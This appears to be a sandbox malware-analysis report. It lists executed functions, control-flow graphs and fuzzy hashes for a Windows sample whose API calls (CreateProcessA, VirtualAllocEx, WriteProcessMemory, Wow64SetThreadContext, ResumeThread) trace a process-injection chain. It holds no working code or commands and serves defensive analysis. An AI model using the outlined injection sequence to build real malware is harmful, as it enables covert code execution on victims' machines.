                                                                                                            execution_graph 18526 c5e2e0 18527 c5e326 18526->18527 18530 c5e8c8 18527->18530 18533 c5cdd0 18530->18533 18534 c5e930 DuplicateHandle 18533->18534 18535 c5e413 18534->18535 18557 c5bf50 18558 c5bf54 18557->18558 18561 c5c038 18558->18561 18559 c5bf5f 18563 c5c03c 18561->18563 18562 c5c07c 18562->18559 18563->18562 18564 c5c280 GetModuleHandleW 18563->18564 18565 c5c2ad 18564->18565 18565->18559 18566 c5ff30 CloseHandle 18567 c5ff97 18566->18567 18568 6e95470 18569 6e955fb 18568->18569 18570 6e95496 18568->18570 18570->18569 18574 6e956e8 18570->18574 18577 6e956f0 PostMessageW 18570->18577 18579 6e956eb 18570->18579 18575 6e9573b PostMessageW 18574->18575 18576 6e9575c 18575->18576 18576->18570 18578 6e9575c 18577->18578 18578->18570 18580 6e956f0 PostMessageW 18579->18580 18581 6e9575c 18580->18581 18581->18570 18582 6e93a33 18586 6e94268 18582->18586 18603 6e94258 18582->18603 18583 6e93a42 18587 6e94282 18586->18587 18597 6e942a6 18587->18597 18621 6e94dee 18587->18621 18626 6e94d8f 18587->18626 18631 6e94b2d 18587->18631 18636 6e947e8 18587->18636 18641 6e94929 18587->18641 18646 6e949d0 18587->18646 18650 6e94cfe 18587->18650 18655 6e9465e 18587->18655 18659 6e946dc 18587->18659 18664 6e94a1d 18587->18664 18669 6e94704 18587->18669 18673 6e94845 18587->18673 18678 6e94aee 18587->18678 18683 6e9478e 18587->18683 18597->18583 18604 6e94262 18603->18604 18605 6e9423f 18603->18605 18606 6e942a6 18604->18606 18607 6e94929 2 API calls 18604->18607 18608 6e947e8 2 API calls 18604->18608 18609 6e94b2d 2 API calls 18604->18609 18610 6e94d8f 2 API calls 18604->18610 18611 6e94dee 2 API calls 18604->18611 18612 6e9478e 2 API calls 18604->18612 18613 6e94aee 2 API calls 18604->18613 18614 6e94845 2 API calls 18604->18614 18615 6e94704 2 API calls 18604->18615 18616 6e94a1d 2 API calls 18604->18616 18617 6e946dc 2 API calls 18604->18617 18618 6e9465e 2 API calls 18604->18618 18619 6e94cfe 2 API calls 18604->18619 18620 6e949d0 2 API calls 18604->18620 18605->18583 18606->18583 18607->18606 18608->18606 18609->18606 18610->18606 18611->18606 18612->18606 18613->18606 18614->18606 18615->18606 18616->18606 18617->18606 18618->18606 18619->18606 18620->18606 18622 6e94dab 18621->18622 18623 6e94df1 18621->18623 18622->18621 18688 6e930a8 18622->18688 18692 6e930a1 18622->18692 18627 6e94d9e 18626->18627 18628 6e94df1 18627->18628 18629 6e930a8 Wow64SetThreadContext 18627->18629 18630 6e930a1 Wow64SetThreadContext 18627->18630 18629->18627 18630->18627 18632 6e94b33 18631->18632 18696 6e953ee 18632->18696 18701 6e953f0 18632->18701 18633 6e94b5e 18637 6e9485d 18636->18637 18638 6e947f2 18636->18638 18714 6e93330 18637->18714 18718 6e93328 18637->18718 18638->18597 18642 6e9484e 18641->18642 18643 6e947f2 18641->18643 18642->18643 18644 6e93328 ReadProcessMemory 18642->18644 18645 6e93330 ReadProcessMemory 18642->18645 18643->18597 18644->18643 18645->18643 18648 6e930a8 Wow64SetThreadContext 18646->18648 18649 6e930a1 Wow64SetThreadContext 18646->18649 18647 6e949ea 18648->18647 18649->18647 18651 6e94a3b 18650->18651 18651->18650 18652 6e95068 18651->18652 18722 6e93238 18651->18722 18726 6e93240 18651->18726 18652->18597 18730 6e934c8 18655->18730 18734 6e934bc 18655->18734 18660 6e946ee 18659->18660 18738 6e93178 18660->18738 18742 6e93180 18660->18742 18661 6e94fe8 18665 6e94a23 18664->18665 18666 6e95068 18665->18666 18667 6e93238 WriteProcessMemory 18665->18667 18668 6e93240 WriteProcessMemory 18665->18668 18666->18597 18667->18665 18668->18665 18671 6e93238 WriteProcessMemory 18669->18671 18672 6e93240 WriteProcessMemory 18669->18672 18670 6e946c4 18670->18597 18671->18670 18672->18670 18674 6e9484e 18673->18674 18675 6e947f2 18674->18675 18676 6e93328 ReadProcessMemory 18674->18676 18677 6e93330 ReadProcessMemory 18674->18677 18675->18597 18676->18675 18677->18675 18679 6e94b03 18678->18679 18680 6e94b5e 18679->18680 18681 6e953ee 2 API calls 18679->18681 18682 6e953f0 2 API calls 18679->18682 18681->18680 18682->18680 18684 6e94f87 18683->18684 18686 6e93238 WriteProcessMemory 18684->18686 18687 6e93240 WriteProcessMemory 18684->18687 18685 6e94fab 18686->18685 18687->18685 18689 6e930ed Wow64SetThreadContext 18688->18689 18691 6e93135 18689->18691 18691->18622 18693 6e930a8 Wow64SetThreadContext 18692->18693 18695 6e93135 18693->18695 18695->18622 18697 6e95405 18696->18697 18706 6e92ff8 18697->18706 18710 6e92ff0 18697->18710 18698 6e95418 18698->18633 18702 6e95405 18701->18702 18704 6e92ff8 ResumeThread 18702->18704 18705 6e92ff0 ResumeThread 18702->18705 18703 6e95418 18703->18633 18704->18703 18705->18703 18707 6e93038 ResumeThread 18706->18707 18709 6e93069 18707->18709 18709->18698 18711 6e92ff8 ResumeThread 18710->18711 18713 6e93069 18711->18713 18713->18698 18715 6e9337b ReadProcessMemory 18714->18715 18717 6e933bf 18715->18717 18717->18638 18719 6e93330 ReadProcessMemory 18718->18719 18721 6e933bf 18719->18721 18721->18638 18723 6e93240 WriteProcessMemory 18722->18723 18725 6e932df 18723->18725 18725->18651 18727 6e93288 WriteProcessMemory 18726->18727 18729 6e932df 18727->18729 18729->18651 18731 6e93551 CreateProcessA 18730->18731 18733 6e93713 18731->18733 18735 6e93551 CreateProcessA 18734->18735 18737 6e93713 18735->18737 18739 6e931c0 VirtualAllocEx 18738->18739 18741 6e931fd 18739->18741 18741->18661 18743 6e931c0 VirtualAllocEx 18742->18743 18745 6e931fd 18743->18745 18745->18661 18536 c54668 18537 c5467a 18536->18537 18538 c54686 18537->18538 18540 c54771 18537->18540 18541 c54774 18540->18541 18545 c54880 18541->18545 18549 c54871 18541->18549 18546 c54884 18545->18546 18548 c54984 18546->18548 18553 c544e4 18546->18553 18551 c54874 18549->18551 18550 c54984 18550->18550 18551->18550 18552 c544e4 CreateActCtxA 18551->18552 18552->18550 18554 c55910 CreateActCtxA 18553->18554 18556 c559d3 18554->18556

                                                                                                            Executed Functions

                                                                                                            Function 06E934BC Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 554 6e934bc-6e9355d 556 6e9355f-6e93569 554->556 557 6e93596-6e935b6 554->557 556->557 558 6e9356b-6e9356d 556->558 564 6e935b8-6e935c2 557->564 565 6e935ef-6e9361e 557->565 559 6e9356f-6e93579 558->559 560 6e93590-6e93593 558->560 562 6e9357b 559->562 563 6e9357d-6e9358c 559->563 560->557 562->563 563->563 566 6e9358e 563->566 564->565 567 6e935c4-6e935c6 564->567 571 6e93620-6e9362a 565->571 572 6e93657-6e93711 CreateProcessA 565->572 566->560 569 6e935e9-6e935ec 567->569 570 6e935c8-6e935d2 567->570 569->565 573 6e935d4 570->573 574 6e935d6-6e935e5 570->574 571->572 575 6e9362c-6e9362e 571->575 585 6e9371a-6e937a0 572->585 586 6e93713-6e93719 572->586 573->574 574->574 576 6e935e7 574->576 577 6e93651-6e93654 575->577 578 6e93630-6e9363a 575->578 576->569 577->572 580 6e9363c 578->580 581 6e9363e-6e9364d 578->581 580->581 581->581 582 6e9364f 581->582 582->577 596 6e937b0-6e937b4 585->596 597 6e937a2-6e937a6 585->597 586->585 599 6e937c4-6e937c8 596->599 600 6e937b6-6e937ba 596->600 597->596 598 6e937a8 597->598 598->596 602 6e937d8-6e937dc 599->602 603 6e937ca-6e937ce 599->603 600->599 601 6e937bc 600->601 601->599 605 6e937ee-6e937f5 602->605 606 6e937de-6e937e4 602->606 603->602 604 6e937d0 603->604 604->602 607 6e9380c 605->607 608 6e937f7-6e93806 605->608 606->605 610 6e9380d 607->610 608->607 610->610
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E936FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 4c913572e61c4f21d0589d6213dd9bf08df223bb748b499af7a4bded8d1a1493
                                                                                                            • Instruction ID: e00cfffe20fa92195a888c2054c39b37a417e066878be4f042bc022edf00f39f
                                                                                                            • Opcode Fuzzy Hash: 4c913572e61c4f21d0589d6213dd9bf08df223bb748b499af7a4bded8d1a1493
                                                                                                            • Instruction Fuzzy Hash: DBA12971D00319DFDF64CF68C8417EEBBB2AF48314F1485AAE819A7280DB759985CFA1
                                                                                                            Function 06E934C8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 611 6e934c8-6e9355d 613 6e9355f-6e93569 611->613 614 6e93596-6e935b6 611->614 613->614 615 6e9356b-6e9356d 613->615 621 6e935b8-6e935c2 614->621 622 6e935ef-6e9361e 614->622 616 6e9356f-6e93579 615->616 617 6e93590-6e93593 615->617 619 6e9357b 616->619 620 6e9357d-6e9358c 616->620 617->614 619->620 620->620 623 6e9358e 620->623 621->622 624 6e935c4-6e935c6 621->624 628 6e93620-6e9362a 622->628 629 6e93657-6e93711 CreateProcessA 622->629 623->617 626 6e935e9-6e935ec 624->626 627 6e935c8-6e935d2 624->627 626->622 630 6e935d4 627->630 631 6e935d6-6e935e5 627->631 628->629 632 6e9362c-6e9362e 628->632 642 6e9371a-6e937a0 629->642 643 6e93713-6e93719 629->643 630->631 631->631 633 6e935e7 631->633 634 6e93651-6e93654 632->634 635 6e93630-6e9363a 632->635 633->626 634->629 637 6e9363c 635->637 638 6e9363e-6e9364d 635->638 637->638 638->638 639 6e9364f 638->639 639->634 653 6e937b0-6e937b4 642->653 654 6e937a2-6e937a6 642->654 643->642 656 6e937c4-6e937c8 653->656 657 6e937b6-6e937ba 653->657 654->653 655 6e937a8 654->655 655->653 659 6e937d8-6e937dc 656->659 660 6e937ca-6e937ce 656->660 657->656 658 6e937bc 657->658 658->656 662 6e937ee-6e937f5 659->662 663 6e937de-6e937e4 659->663 660->659 661 6e937d0 660->661 661->659 664 6e9380c 662->664 665 6e937f7-6e93806 662->665 663->662 667 6e9380d 664->667 665->664 667->667
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E936FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: f41001d4afc66ede26e5abd5caec05357a6b8eae7b6645549fa698d8e16ea4b8
                                                                                                            • Instruction ID: 4b57857eb5d80c19798b075d89c3f6641cd0497e8bf5f64a8bb8970c7925ff43
                                                                                                            • Opcode Fuzzy Hash: f41001d4afc66ede26e5abd5caec05357a6b8eae7b6645549fa698d8e16ea4b8
                                                                                                            • Instruction Fuzzy Hash: 88913871D00319DFDF64CF68C8417EEBBB2AF48314F1485AAE819A7280DB759985CFA1
                                                                                                            Function 00C5C038 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 668 c5c038-c5c03a 669 c5c040-c5c046 668->669 670 c5c03c-c5c03e 668->670 672 c5c04c-c5c057 669->672 673 c5c048-c5c04b 669->673 670->669 674 c5c083-c5c087 672->674 675 c5c059-c5c066 call c5b350 672->675 673->672 677 c5c089-c5c093 674->677 678 c5c09b-c5c0dc 674->678 681 c5c07c 675->681 682 c5c068 675->682 677->678 684 c5c0de-c5c0e6 678->684 685 c5c0e9-c5c0f7 678->685 681->674 728 c5c06e call c5c2d0 682->728 729 c5c06e call c5c2e0 682->729 684->685 686 c5c0f9-c5c0fe 685->686 687 c5c11b-c5c11d 685->687 689 c5c100-c5c107 call c5b35c 686->689 690 c5c109 686->690 692 c5c120-c5c127 687->692 688 c5c074-c5c076 688->681 691 c5c1b8-c5c278 688->691 694 c5c10b-c5c119 689->694 690->694 723 c5c280-c5c2ab GetModuleHandleW 691->723 724 c5c27a-c5c27d 691->724 695 c5c134-c5c13b 692->695 696 c5c129-c5c131 692->696 694->692 699 c5c13d-c5c145 695->699 700 c5c148-c5c151 call c5b36c 695->700 696->695 699->700 704 c5c153-c5c15b 700->704 705 c5c15e-c5c163 700->705 704->705 706 c5c165-c5c16c 705->706 707 c5c181-c5c18e 705->707 706->707 709 c5c16e-c5c17e call c5b37c call c5b38c 706->709 714 c5c1b1-c5c1b7 707->714 715 c5c190-c5c1ae 707->715 709->707 715->714 725 c5c2b4-c5c2c8 723->725 726 c5c2ad-c5c2b3 723->726 724->723 726->725 728->688 729->688
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1ed2e62ccb846d2a51d48f439468a3c374b0b5f2c71fd9c6009b29cc8f795374
                                                                                                            • Instruction ID: 864087304564509f23593a1701ef699fb37c42efe5dc4afddde1fed94e357cfc
                                                                                                            • Opcode Fuzzy Hash: 1ed2e62ccb846d2a51d48f439468a3c374b0b5f2c71fd9c6009b29cc8f795374
                                                                                                            • Instruction Fuzzy Hash: D9816774A00B058FD724DF2AC48175ABBF1FF88301F008A2DD856D7A51DB74E989CB94
                                                                                                            Function 00C55905 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 840 c55905-c55906 841 c5590c-c5590e 840->841 842 c55908 840->842 843 c55914-c559d1 CreateActCtxA 841->843 844 c55910-c55913 841->844 842->841 846 c559d3-c559d9 843->846 847 c559da-c55a34 843->847 844->843 846->847 854 c55a36-c55a39 847->854 855 c55a43-c55a47 847->855 854->855 856 c55a49-c55a55 855->856 857 c55a58 855->857 856->857 859 c55a59 857->859 859->859
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C559C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 255204c243599e0e4f99c85f9e48e09a904a3fdcbaa105d491f176d6db6deaaa
                                                                                                            • Instruction ID: 9104e96fea6315c63f53d7dc14baa259d4bd385f731ab88479a95c1682bade10
                                                                                                            • Opcode Fuzzy Hash: 255204c243599e0e4f99c85f9e48e09a904a3fdcbaa105d491f176d6db6deaaa
                                                                                                            • Instruction Fuzzy Hash: D74115B0C0071DCBDB24CFA9C844B9DBBF1BF44305F20806AD419AB251DB756989CF90
                                                                                                            Function 00C544E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 860 c544e4-c559d1 CreateActCtxA 864 c559d3-c559d9 860->864 865 c559da-c55a34 860->865 864->865 872 c55a36-c55a39 865->872 873 c55a43-c55a47 865->873 872->873 874 c55a49-c55a55 873->874 875 c55a58 873->875 874->875 877 c55a59 875->877 877->877
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C559C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: c65ae9bee1815711ef58a258aa5716b6b3e60cd9fb502c64b8b80a2ec875f235
                                                                                                            • Instruction ID: 7a3f9a7c6598e9866fa17552f952869a9cc8b1810c02f87c319d707865f74022
                                                                                                            • Opcode Fuzzy Hash: c65ae9bee1815711ef58a258aa5716b6b3e60cd9fb502c64b8b80a2ec875f235
                                                                                                            • Instruction Fuzzy Hash: 3D41E4B1C0071DCBDB24DFA9C844B9DBBF5BF44305F20806AD419AB251DB756A89CF90
                                                                                                            Function 06E93238 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 878 6e93238-6e9328e 881 6e9329e-6e932dd WriteProcessMemory 878->881 882 6e93290-6e9329c 878->882 884 6e932df-6e932e5 881->884 885 6e932e6-6e93316 881->885 882->881 884->885
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E932D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 315d5b766771116817bc05b5453bdfd87597d400754803315ef54476165a6a61
                                                                                                            • Instruction ID: 04cc514b34a82fc330cd7a5fd25df933ac89366d9c9bf453f7cd0431554bfac4
                                                                                                            • Opcode Fuzzy Hash: 315d5b766771116817bc05b5453bdfd87597d400754803315ef54476165a6a61
                                                                                                            • Instruction Fuzzy Hash: 0F2144B19003099FDF10DFAAC885BDEBBF5FF48324F10842AE919A7240C7789954CBA4
                                                                                                            Function 06E93240 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 889 6e93240-6e9328e 891 6e9329e-6e932dd WriteProcessMemory 889->891 892 6e93290-6e9329c 889->892 894 6e932df-6e932e5 891->894 895 6e932e6-6e93316 891->895 892->891 894->895
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E932D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 3fe157d71f699840f84bd5e873eb7985660468ed8ff96910790b4d780c52ff23
                                                                                                            • Instruction ID: 56b82d81ee2cac013e71dec63b998a2d3a04ce50f5bb0395d5835e53ce3fd62b
                                                                                                            • Opcode Fuzzy Hash: 3fe157d71f699840f84bd5e873eb7985660468ed8ff96910790b4d780c52ff23
                                                                                                            • Instruction Fuzzy Hash: DD2124B19003499FCB10DFAAC885BDEBBF5FF48314F10842AE919A7240C7789954CBA4
                                                                                                            Function 06E93328 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 899 6e93328-6e933bd ReadProcessMemory 903 6e933bf-6e933c5 899->903 904 6e933c6-6e933f6 899->904 903->904
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E933B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 88d488641fdd910a2ef3f938702b69be3f2eaebd1c94db6e0f12563ec7c8b828
                                                                                                            • Instruction ID: 77cdf082a5420ce8d5b921aa627b1b6b1821389015e6934e31939533b65ca67d
                                                                                                            • Opcode Fuzzy Hash: 88d488641fdd910a2ef3f938702b69be3f2eaebd1c94db6e0f12563ec7c8b828
                                                                                                            • Instruction Fuzzy Hash: 58212AB1D003499FCB10DFAAC885AEEFBF5FF48320F508429E519A7240CB799545DBA5
                                                                                                            Function 06E930A1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 914 6e930a1-6e930f3 917 6e93103-6e93133 Wow64SetThreadContext 914->917 918 6e930f5-6e93101 914->918 920 6e9313c-6e9316c 917->920 921 6e93135-6e9313b 917->921 918->917 921->920
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E93126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 340c144e6dbf03f7cff798b20e6b84a5e61770a0d8a1b8ab7e7a6768ac60d400
                                                                                                            • Instruction ID: 583210dc46e719830dd719c2b4354e7b7233e4bca9bbe50aae50298c7864ed3c
                                                                                                            • Opcode Fuzzy Hash: 340c144e6dbf03f7cff798b20e6b84a5e61770a0d8a1b8ab7e7a6768ac60d400
                                                                                                            • Instruction Fuzzy Hash: 442128B1D003098FDB10DFAAC8857AEBBF4EF49314F14842AD419A7241DB789944CBA5
                                                                                                            Function 00C5CDD0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 908 c5cdd0-c5e9c4 DuplicateHandle 910 c5e9c6-c5e9cc 908->910 911 c5e9cd-c5e9ea 908->911 910->911
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C5E8F6,?,?,?,?,?), ref: 00C5E9B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 4c2797ce9f8598f67f9bc7f691400f71432ed966cceabee5582345edbb8cf3f5
                                                                                                            • Instruction ID: 68ea90b36a5c5864f44e52a52da7ea638d4a3b67dc259c476f50d5ab2ec62652
                                                                                                            • Opcode Fuzzy Hash: 4c2797ce9f8598f67f9bc7f691400f71432ed966cceabee5582345edbb8cf3f5
                                                                                                            • Instruction Fuzzy Hash: C421E3B5D10208AFDB10DF9AD984ADEBBF9EB48310F14841AE918A3351D374AA54CFA5
                                                                                                            Function 06E93330 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E933B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: d304f673ee250ad19e28e028f58df5ab21691e24245bcafd1fc79efb287151f1
                                                                                                            • Instruction ID: cd49c58c24600089ff28337fb0b5f3dc31351edddf5b2b3317ae949fdcbdc06d
                                                                                                            • Opcode Fuzzy Hash: d304f673ee250ad19e28e028f58df5ab21691e24245bcafd1fc79efb287151f1
                                                                                                            • Instruction Fuzzy Hash: A72139B1D003499FCB10DFAAC885AEEFBF5FF48310F108429E519A7240CB749944DBA5
                                                                                                            Function 06E930A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 925 6e930a8-6e930f3 927 6e93103-6e93133 Wow64SetThreadContext 925->927 928 6e930f5-6e93101 925->928 930 6e9313c-6e9316c 927->930 931 6e93135-6e9313b 927->931 928->927 931->930
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E93126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 4f3e752995fb707ff69639ed41d193dc2c83d1cac8a6e5f4c72187efba02f004
                                                                                                            • Instruction ID: b59c57ce8c76fda4cc44b2e298bee86cc995d96ab85a52d168434b55d8da45c3
                                                                                                            • Opcode Fuzzy Hash: 4f3e752995fb707ff69639ed41d193dc2c83d1cac8a6e5f4c72187efba02f004
                                                                                                            • Instruction Fuzzy Hash: 6E2137B1D003098FDB10DFAAC8857AEBBF4EF89324F10842AD419A7241CB789944CFA5
                                                                                                            Function 06E93178 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E931EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 6fe460816fa8d7f656f8d242247222bb475acf1c66e022e2d4fcb699eff8989f
                                                                                                            • Instruction ID: 1234fb347b7a09d8a7d4c3c495c9786fee043f7b864c5bf260a612fb9262dd0e
                                                                                                            • Opcode Fuzzy Hash: 6fe460816fa8d7f656f8d242247222bb475acf1c66e022e2d4fcb699eff8989f
                                                                                                            • Instruction Fuzzy Hash: 76116A759003488FCB10DFA9C845AEFBFF1EF88320F248419E519A7250CB759944CFA0
                                                                                                            Function 06E93180 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E931EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 34293327bee44d34c614d0b39119a60571c329d0eabe815e8b33a0ab77721304
                                                                                                            • Instruction ID: 9adfb5710c9866ac755cee8bdf2deb48fd75107e8ddb2260345fc47034aa21b9
